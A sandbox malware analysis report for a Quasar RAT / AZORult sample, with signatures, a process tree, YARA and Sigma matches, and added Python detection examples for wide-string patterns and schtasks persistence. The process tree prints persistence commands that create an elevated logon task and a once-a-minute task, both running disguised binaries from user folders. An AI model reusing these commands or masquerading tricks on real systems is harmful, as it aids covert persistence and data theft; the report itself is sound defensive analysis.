Windows Analysis Report CVbJSUXraQ

Overview

General Information

Sample Name: CVbJSUXraQ (renamed file extension from none to exe)
Analysis ID: 492794
MD5: b0b78da613422be0de8de2e2a2d0ce68
SHA1: a1aea30e16b3bbf15baf1fbb78499adcc5e11d97
SHA256: efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0
Tags: exe, QuasarRAT

Detection

Detected families: AZORult, Quasar, Ramnit
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected Azorult Info Stealer
Antivirus detection for dropped file
Yara detected Quasar RAT
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected AZORult Info Stealer
Yara detected Ramnit VNC Module
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Contains VNC / remote desktop functionality (version string found)
Maps a DLL or memory area into another process
Uses known network protocols on non-standard ports
Binary is likely a compiled AutoIt script file
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign processes
Sigma detected: Suspicious Svchost Process
Contains functionality to inject code into remote processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
.NET source code references suspicious native API functions
Machine Learning detection for dropped file
AutoIt script contains suspicious strings
Modifies the context of a thread in another process (thread injection)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Yara detected Keylogger Generic
Contains functionality to retrieve information about pressed keystrokes
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Process Tree

  • System is w10x64
  • CVbJSUXraQ.exe (PID: 7128 cmdline: 'C:\Users\user\Desktop\CVbJSUXraQ.exe' MD5: B0B78DA613422BE0DE8DE2E2A2D0CE68)
    • vnc.exe (PID: 6296 cmdline: 'C:\Users\user\AppData\Local\Temp\vnc.exe' MD5: B8BA87EE4C3FC085A2FED0D839AADCE1)
      • svchost.exe (PID: 5200 cmdline: C:\Windows\system32\svchost.exe -k MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • windef.exe (PID: 5848 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)
      • schtasks.exe (PID: 5812 cmdline: 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5784 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • winsock.exe (PID: 5628 cmdline: C:\Users\user\AppData\Roaming\SubDir\winsock.exe MD5: B4A202E03D4135484D0E730173ABCC72)
        • schtasks.exe (PID: 6504 cmdline: 'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Roaming\SubDir\winsock.exe' /rl HIGHEST /f MD5: 15FF7D8324231381BAD48A052F85DF04)
          • conhost.exe (PID: 6508 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • CVbJSUXraQ.exe (PID: 4112 cmdline: C:\Users\user\Desktop\CVbJSUXraQ.exe MD5: B0B78DA613422BE0DE8DE2E2A2D0CE68)
    • schtasks.exe (PID: 6836 cmdline: 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • SystemPropertiesPerformance.exe (PID: 6424 cmdline: C:\Users\user\btpanui\SystemPropertiesPerformance.exe MD5: 9423821A023FB02427783F6385871B3B)
    • vnc.exe (PID: 4420 cmdline: 'C:\Users\user\AppData\Local\Temp\vnc.exe' MD5: B8BA87EE4C3FC085A2FED0D839AADCE1)
      • svchost.exe (PID: 1900 cmdline: C:\Windows\system32\svchost.exe -k MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • windef.exe (PID: 4100 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)
    • schtasks.exe (PID: 2092 cmdline: 'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 5904 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • windef.exe (PID: 6608 cmdline: C:\Users\user\AppData\Local\Temp\windef.exe MD5: B4A202E03D4135484D0E730173ABCC72)
  • windef.exe (PID: 6684 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)
  • windef.exe (PID: 7144 cmdline: 'C:\Users\user\AppData\Local\Temp\windef.exe' MD5: B4A202E03D4135484D0E730173ABCC72)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Initial Sample

Source | Rule | Description | Author
CVbJSUXraQ.exe | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x1db64a:$s1: DoUploadAndExecute
  • 0x1e0f61:$s2: DoDownloadAndExecute
  • 0x1db420:$s3: DoShellExecute
  • 0x1db842:$s4: set_Processname
  • 0x1a9bdc:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x1a9b00:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x1aa56d:$op3: 00 04 03 69 91 1B 40
  • 0x1aadcc:$op3: 00 04 03 69 91 1B 40
CVbJSUXraQ.exe | Quasar_RAT_2 | Detects Quasar RAT | Florian Roth
  • 0x1daea0:$x1: GetKeyloggerLogsResponse
  • 0x1db0e0:$s1: DoShellExecuteResponse
  • 0x1d44ce:$s2: GetPasswordsResponse
  • 0x1dafb3:$s3: GetStartupItemsResponse
  • 0x1d179c:$s4: <GetGenReader>b__7
  • 0x1db65e:$s5: RunHidden
  • 0x1db67c:$s5: RunHidden
  • 0x1db68a:$s5: RunHidden
  • 0x1db69e:$s5: RunHidden
CVbJSUXraQ.exe | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth
  • 0x1e3f78:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
CVbJSUXraQ.exe | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
CVbJSUXraQ.exe | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
(1 more entry not shown)

Dropped Files

Source | Rule | Description | Author
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | Vermin_Keylogger_Jan18_1 | Detects Vermin Keylogger | Florian Roth
  • 0x456f4:$x3: GetKeyloggerLogsResponse
  • 0x45bea:$x4: GetKeyloggerLogs
  • 0x45eb1:$s1: <RunHidden>k__BackingField
  • 0x458bc:$s2: set_SystemInfos
  • 0x45eda:$s3: set_RunHidden
  • 0x45ae8:$s4: set_RemotePath
  • 0x56bf8:$s6: Client.exe
  • 0x56c60:$s6: Client.exe
  • 0x4af5b:$s7: xClient.Core.ReverseProxy.Packets
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | xRAT_1 | Detects Patchwork malware | Florian Roth
  • 0x30a28:$x4: xClient.Properties.Resources.resources
  • 0x308e9:$s4: Client.exe
  • 0x45eda:$s7: set_RunHidden
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x45e9e:$s1: DoUploadAndExecute
  • 0x4b7b5:$s2: DoDownloadAndExecute
  • 0x45c74:$s3: DoShellExecute
  • 0x46096:$s4: set_Processname
  • 0x14430:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x14354:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x14dc1:$op3: 00 04 03 69 91 1B 40
  • 0x15620:$op3: 00 04 03 69 91 1B 40
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | Quasar_RAT_2 | Detects Quasar RAT | Florian Roth
  • 0x456f4:$x1: GetKeyloggerLogsResponse
  • 0x45934:$s1: DoShellExecuteResponse
  • 0x3ed22:$s2: GetPasswordsResponse
  • 0x45807:$s3: GetStartupItemsResponse
  • 0x3bff0:$s4: <GetGenReader>b__7
  • 0x45eb2:$s5: RunHidden
  • 0x45ed0:$s5: RunHidden
  • 0x45ede:$s5: RunHidden
  • 0x45ef2:$s5: RunHidden
C:\Users\user\AppData\Roaming\SubDir\winsock.exe | MAL_QuasarRAT_May19_1 | Detects QuasarRAT malware | Florian Roth
  • 0x4e7cc:$xc2: 00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E 00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20 ...
(26 more entries not shown)

Memory Dumps

Source | Rule | Description | Author
00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp | Quasar_RAT_1 | Detects Quasar RAT | Florian Roth
  • 0x45e6e:$s1: DoUploadAndExecute
  • 0x4b785:$s2: DoDownloadAndExecute
  • 0x45c44:$s3: DoShellExecute
  • 0x46066:$s4: set_Processname
  • 0x14400:$op1: 04 1E FE 02 04 16 FE 01 60
  • 0x14324:$op2: 00 17 03 1F 20 17 19 15 28
  • 0x14d91:$op3: 00 04 03 69 91 1B 40
  • 0x155f0:$op3: 00 04 03 69 91 1B 40
00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp | JoeSecurity_Quasar | Yara detected Quasar RAT | Joe Security
0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000015.00000002.946249267.00000000007F7000.00000040.00020000.sdmp | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
(191 more entries not shown)

Unpacked PEs

Source | Rule | Description | Author
1.2.CVbJSUXraQ.exe.ee9fac.3.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
1.2.CVbJSUXraQ.exe.ee9fac.3.unpack | JoeSecurity_ramnitvncmodule | Yara detected Ramnit VNC Module | Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.unpack | JoeSecurity_Keylogger_Generic | Yara detected Keylogger Generic | Joe Security
7.2.CVbJSUXraQ.exe.ee9fac.3.unpack | JoeSecurity_ramnitvncmodule | Yara detected Ramnit VNC Module | Joe Security
6.0.windef.exe.f10000.0.unpack | Vermin_Keylogger_Jan18_1 | Detects Vermin Keylogger | Florian Roth
  • 0x456f4:$x3: GetKeyloggerLogsResponse
  • 0x45bea:$x4: GetKeyloggerLogs
  • 0x45eb1:$s1: <RunHidden>k__BackingField
  • 0x458bc:$s2: set_SystemInfos
  • 0x45eda:$s3: set_RunHidden
  • 0x45ae8:$s4: set_RemotePath
  • 0x56bf8:$s6: Client.exe
  • 0x56c60:$s6: Client.exe
  • 0x4af5b:$s7: xClient.Core.ReverseProxy.Packets
(458 more entries not shown)
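
The Strings column above lists, for every match, the file offset, the rule's string identifier and the bytes found; the $xc2 pattern of MAL_QuasarRAT_May19_1 is a UTF-16LE ("wide") string printed as hex, which is why every second byte is 00. The Python below is an added example, not code from Joe Sandbox or from the rule authors. It decodes that wide pattern back to text and shows how the offsets in this column are produced by scanning a buffer for the ASCII and opcode patterns quoted for Quasar_RAT_1. It does not reproduce the rules' conditions (the page does not print them), and the buffer it scans is constructed for the example, not the analysed binary.

```python
"""Decode the wide-string pattern and locate rule strings in a buffer.

Added example; not from the report or the YARA rule authors. Only the
string/opcode patterns quoted in the report are used, never the rules'
full conditions. SAMPLE is a constructed buffer, not the analysed file.
"""
import re

# $xc2 of MAL_QuasarRAT_May19_1, copied from the report (truncated there).
XC2_HEX = (
    "00 70 00 69 00 6E 00 67 00 20 00 2D 00 6E 00 20 00 31 00 30 00 20 "
    "00 6C 00 6F 00 63 00 61 00 6C 00 68 00 6F 00 73 00 74 00 20 00 3E "
    "00 20 00 6E 00 75 00 6C 00 0D 00 0A 00 64 00 65 00 6C 00 20"
)

# Strings of Quasar_RAT_1 as listed in the report: identifier -> (kind, value).
QUASAR_RAT_1_STRINGS = {
    "$s1": ("ascii", "DoUploadAndExecute"),
    "$s2": ("ascii", "DoDownloadAndExecute"),
    "$s3": ("ascii", "DoShellExecute"),
    "$s4": ("ascii", "set_Processname"),
    "$op1": ("hex", "04 1E FE 02 04 16 FE 01 60"),
    "$op2": ("hex", "00 17 03 1F 20 17 19 15 28"),
    "$op3": ("hex", "00 04 03 69 91 1B 40"),
}


def hex_to_bytes(dump: str) -> bytes:
    """Convert a space-separated hex dump (trailing '...' allowed) to bytes."""
    return bytes.fromhex(re.sub(r"[^0-9A-Fa-f]", "", dump))


def decode_wide(data: bytes) -> str:
    """Decode a UTF-16LE fragment that may start on the high (NUL) byte of the
    preceding character, as YARA hex patterns for wide strings often do.
    Both byte alignments are tried; the one yielding more ASCII wins."""
    best = ""
    for offset in (0, 1):
        chunk = data[offset:]
        if len(chunk) % 2:              # pattern was cut mid-character
            chunk += b"\x00"
        text = chunk.decode("utf-16-le", errors="replace")
        if sum(c.isascii() for c in text) > sum(c.isascii() for c in best):
            best = text
    return best


def compile_patterns(spec: dict) -> dict:
    """Turn (kind, value) specs into raw byte needles; 'wide' is UTF-16LE."""
    encoders = {
        "ascii": lambda v: v.encode("ascii"),
        "wide": lambda v: v.encode("utf-16-le"),
        "hex": hex_to_bytes,
    }
    return {name: encoders[kind](value) for name, (kind, value) in spec.items()}


def find_all(data: bytes, needles: dict) -> dict:
    """Return {identifier: [offsets]} for every occurrence of every needle."""
    hits = {}
    for name, needle in needles.items():
        pos, offsets = data.find(needle), []
        while pos != -1:
            offsets.append(pos)
            pos = data.find(needle, pos + 1)
        if offsets:
            hits[name] = offsets
    return hits


def report_lines(data: bytes, spec: dict) -> list:
    """Format hits the way the report's Strings column does: '0x10:$s1: ...'."""
    lines = []
    for name, offsets in find_all(data, compile_patterns(spec)).items():
        for off in offsets:
            lines.append(f"0x{off:x}:{name}: {spec[name][1]}")
    return sorted(lines, key=lambda line: int(line.split(":")[0], 16))


# Constructed buffer: fake MZ header, then some of the strings at known
# offsets (16, 40, 49, 65 and 75). Not the analysed sample.
SAMPLE = (
    b"MZ" + b"\x00" * 14
    + b"DoUploadAndExecute\x00"
    + b"\x90" * 5
    + hex_to_bytes("04 1E FE 02 04 16 FE 01 60")
    + b"set_Processname\x00"
    + hex_to_bytes("00 04 03 69 91 1B 40")
    + b"\x00" * 3
    + hex_to_bytes("00 04 03 69 91 1B 40")
)

if __name__ == "__main__":
    print(repr(decode_wide(hex_to_bytes(XC2_HEX))))
    print("\n".join(report_lines(SAMPLE, QUASAR_RAT_1_STRINGS)))
```

Decoding $xc2 yields the start of the batch file Quasar writes to delete itself ("ping -n 10 localhost > nul" followed by "del "), which is why a rule can key on it as a wide string. Note that the matcher above reports every string that is present, while a real YARA rule only fires when its condition over those strings is met.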

Sigma Overview

System Summary:

Sigma detected: Suspicious Svchost Process
Source: Process started | Author: Florian Roth | Data: Command: C:\Windows\system32\svchost.exe -k, CommandLine: C:\Windows\system32\svchost.exe -k, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\vnc.exe', ParentImage: C:\Users\user\AppData\Local\Temp\vnc.exe, ParentProcessId: 6296, ProcessCommandLine: C:\Windows\system32\svchost.exe -k, ProcessId: 5200
Sigma detected: Windows Processes Suspicious Parent Directory
Source: Process started | Author: vburov | Data: Command: C:\Windows\system32\svchost.exe -k, CommandLine: C:\Windows\system32\svchost.exe -k, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: 'C:\Users\user\AppData\Local\Temp\vnc.exe', ParentImage: C:\Users\user\AppData\Local\Temp\vnc.exe, ParentProcessId: 6296, ProcessCommandLine: C:\Windows\system32\svchost.exe -k, ProcessId: 5200
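
The process tree records two schtasks.exe persistence commands (a logon task with /rl HIGHEST whose action lives in the user's Temp folder, and a task that re-runs a copy named SystemPropertiesPerformance.exe from the user profile every minute), and the Sigma matches record svchost.exe started by vnc.exe instead of services.exe with a bare "-k" and no service group. The Python below is an added example, not code from Joe Sandbox or from the Sigma rule authors. It applies both checks to process-creation events shaped like the Sigma output above (Image, ParentImage, CommandLine), using the command lines copied from this report plus constructed benign controls. The user-writable prefixes, the short list of Windows binary names, the five-minute threshold and the tokenizer's acceptance of single quotes (which is how the report renders quoting) are assumptions of the example; the public Sigma rule also carries parent exclusions that are not reproduced here.

```python
"""Triage process-creation events for two behaviours in this report.

Added example; not code from Joe Sandbox or the Sigma rule authors.
Checks: schtasks.exe task creation pointing into user-writable paths
(the persistence in the process tree) and svchost.exe started by an
unexpected parent (the idea behind 'Suspicious Svchost Process').
Prefixes, name lists and thresholds below are assumptions.
"""
USER_WRITABLE_PREFIXES = ("c:\\users\\", "%appdata%", "%localappdata%", "%temp%", "%userprofile%")
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")
SYSTEM_BINARY_NAMES = {"svchost.exe", "systempropertiesperformance.exe"}   # illustrative, not exhaustive
HIGH_FREQ_MINUTES = 5

R_USER_PATH = "task action lives in a user-writable path"
R_ELEVATED_LOGON = "task runs with highest privileges at logon/startup"
R_HIGH_FREQ = "task re-executes every few minutes"
R_MASQUERADE = "action file name imitates a Windows binary outside the system directory"
R_SVCHOST_PARENT = "svchost.exe not started by services.exe"
R_SVCHOST_NO_GROUP = "svchost.exe '-k' without a service group name"


def split_cmdline(cmdline: str) -> list:
    """Minimal tokenizer. Windows groups only with double quotes; the report
    renders them as single quotes, so both are accepted here."""
    tokens, cur, quote = [], "", None
    for ch in cmdline:
        if quote:
            if ch == quote:
                quote = None
            else:
                cur += ch
        elif ch in "\"'":
            quote = ch
        elif ch.isspace():
            if cur:
                tokens.append(cur)
            cur = ""
        else:
            cur += ch
    if cur:
        tokens.append(cur)
    return tokens


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def parse_schtasks(cmdline: str) -> dict:
    """Return the /option -> value map of a 'schtasks /create' command, else {}."""
    toks = split_cmdline(cmdline)
    if not toks or basename(toks[0]) not in ("schtasks", "schtasks.exe"):
        return {}
    opts = {}
    for i, tok in enumerate(toks[1:], 1):
        if tok.startswith("/"):
            has_value = i + 1 < len(toks) and not toks[i + 1].startswith("/")
            opts[tok.lower()] = toks[i + 1] if has_value else True
    return opts if "/create" in opts else {}


def assess_schtasks(cmdline: str) -> list:
    """Reasons a task creation looks like malware persistence."""
    opts = parse_schtasks(cmdline)
    if not isinstance(opts.get("/tr"), str):
        return []
    action = split_cmdline(opts["/tr"])[0].lower()      # the executable, minus its arguments
    schedule = str(opts.get("/sc", "")).lower()
    interval = str(opts.get("/mo", "1"))
    reasons = []
    if action.startswith(USER_WRITABLE_PREFIXES):
        reasons.append(R_USER_PATH)
    if schedule in ("onlogon", "onstart") and str(opts.get("/rl", "")).lower() == "highest":
        reasons.append(R_ELEVATED_LOGON)
    if schedule == "minute" and interval.isdigit() and int(interval) <= HIGH_FREQ_MINUTES:
        reasons.append(R_HIGH_FREQ)
    if basename(action) in SYSTEM_BINARY_NAMES and not action.startswith(SYSTEM_DIRS):
        reasons.append(R_MASQUERADE)
    return reasons


def assess_svchost(event: dict) -> list:
    """Reasons an svchost.exe start is suspicious (simplified Sigma logic)."""
    if basename(event.get("Image", "")) != "svchost.exe":
        return []
    reasons = []
    if basename(event.get("ParentImage", "")) != "services.exe":
        reasons.append(R_SVCHOST_PARENT)
    toks = [t.lower() for t in split_cmdline(event.get("CommandLine", ""))]
    if "-k" in toks:
        nxt = toks.index("-k") + 1
        if nxt >= len(toks) or toks[nxt].startswith("-"):
            reasons.append(R_SVCHOST_NO_GROUP)
    return reasons


# Copied from the report: process-tree command lines (quotes as rendered) and the Sigma event.
REPORT_SCHTASKS = [
    r"'schtasks' /create /tn 'win defender run' /sc ONLOGON /tr 'C:\Users\user\AppData\Local\Temp\windef.exe' /rl HIGHEST /f",
    r"'C:\Windows\SysWOW64\schtasks.exe' /create /tn RtkAudioService64 /tr 'C:\Users\user\btpanui\SystemPropertiesPerformance.exe' /sc minute /mo 1 /F",
]
REPORT_SVCHOST_EVENT = {"Image": r"C:\Windows\System32\svchost.exe",
                        "ParentImage": r"C:\Users\user\AppData\Local\Temp\vnc.exe",
                        "CommandLine": r"C:\Windows\system32\svchost.exe -k"}
# Constructed benign controls, not from the report.
BENIGN_SCHTASKS = r'"C:\Windows\System32\schtasks.exe" /create /tn NightlyBackup /sc DAILY /st 02:00 /tr "C:\Program Files\Backup\backup.exe"'
BENIGN_SVCHOST_EVENT = {"Image": r"C:\Windows\System32\svchost.exe",
                        "ParentImage": r"C:\Windows\System32\services.exe",
                        "CommandLine": r"C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule"}

if __name__ == "__main__":
    print([assess_schtasks(c) for c in REPORT_SCHTASKS], assess_svchost(REPORT_SVCHOST_EVENT))
```

Both report command lines trip the user-writable-path check; the first additionally runs elevated at logon, the second re-executes every minute under a Windows binary's name. The svchost.exe event is flagged on two independent grounds, so the check still fires on samples that pass a group name but keep vnc.exe as the parent.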

Jbx Signature Overview

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\windef.exe | Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Avira: detection malicious, Label: TR/Spy.Agent.zgvfh
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe | Avira: detection malicious, Label: TR/AutoIt.tyemd
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe | Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\AppData\Local\Temp\vnc.exe | Avira: detection malicious, Label: TR/Hijacker.W
Yara detected Quasar RAT
Source: Yara match | File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match | File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
